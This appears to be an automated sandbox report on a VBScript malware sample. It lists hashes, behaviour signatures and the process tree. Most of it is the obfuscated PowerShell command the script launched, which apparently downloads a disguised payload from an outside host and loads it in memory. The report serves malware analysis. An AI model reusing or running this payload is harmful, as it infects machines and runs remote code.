Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    07/12/2023, 12:48

General

  • Target

    envifa.vbs

  • Size

    154KB

  • MD5

    18bb62e29138d9c8dd098e5be9a4c13c

  • SHA1

    5362535f49fee8fd7333be8fc6ea249deffa2eb9

  • SHA256

    e0ad36136960203db1aea53780b49ef2c819ad31d68980822c4dff0d8dab1a14

  • SHA512

    0a0e37dab52b3892a9148e40f12408256c8d8eb6dede9217bb47cda010ae672775bd88535b0ab94c6800b3e22ab7c53ae6e9fe8dcd790e9849cfb749fa5b77b8

  • SSDEEP

    384:5UDkE9rQyhN65y//88tyLYtymNDycT+zjgyX4uynPivlytR/dJPfyFfhywzqggCq:j2Nek58Rc

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\envifa.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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